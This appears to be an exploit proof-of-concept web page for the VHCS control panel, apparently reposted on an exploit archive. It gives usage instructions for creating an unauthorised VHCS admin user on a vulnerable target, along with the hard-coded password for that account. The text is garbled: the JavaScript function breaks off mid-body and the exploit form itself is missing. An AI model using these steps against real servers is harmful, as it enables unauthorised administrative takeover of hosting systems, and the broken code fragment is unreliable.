<head>
<title>VHCS (version <= 2.4.7.1) PoC. By RoMaNSoFt</title>
<script language="JavaScript">
function submitform()
{
if (document.admin_add_user.username.value=='admin')
{
alert('Learn to read before launching an exploit, script-kiddie!');
exit();
}
<hr>
<br>
<u>Quick instructions</u>.-<br>
<br>
1.- Enable JavaScript. Fill in the form with appropiate target URL
(usually you will only need to replace <target> string) and
username.<br>
2.- Remember not to use a probably existing username (such as
"admin").<br>
3.- Launch the exploit. <i>If target system is vulnerable, a new
VHCS admin user will be created</i> ;-)<br>
4.- You will be redirected to VHCS login page. Try to login with
your brand new username.<br>
5.- Ummm, I forgot it... The password is: <b>dsrrocks</b>.<br>
<br>
<u>More info (analysis, fix, etc)</u>.-<br>
<br>
See <a
href=http://www.rs-labs.com/adv/RS-Labs-Advisory-2006-1.txt><i>RS-2006-1</i
></a>.<br>
<br>
<hr>
</body>
</html>
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.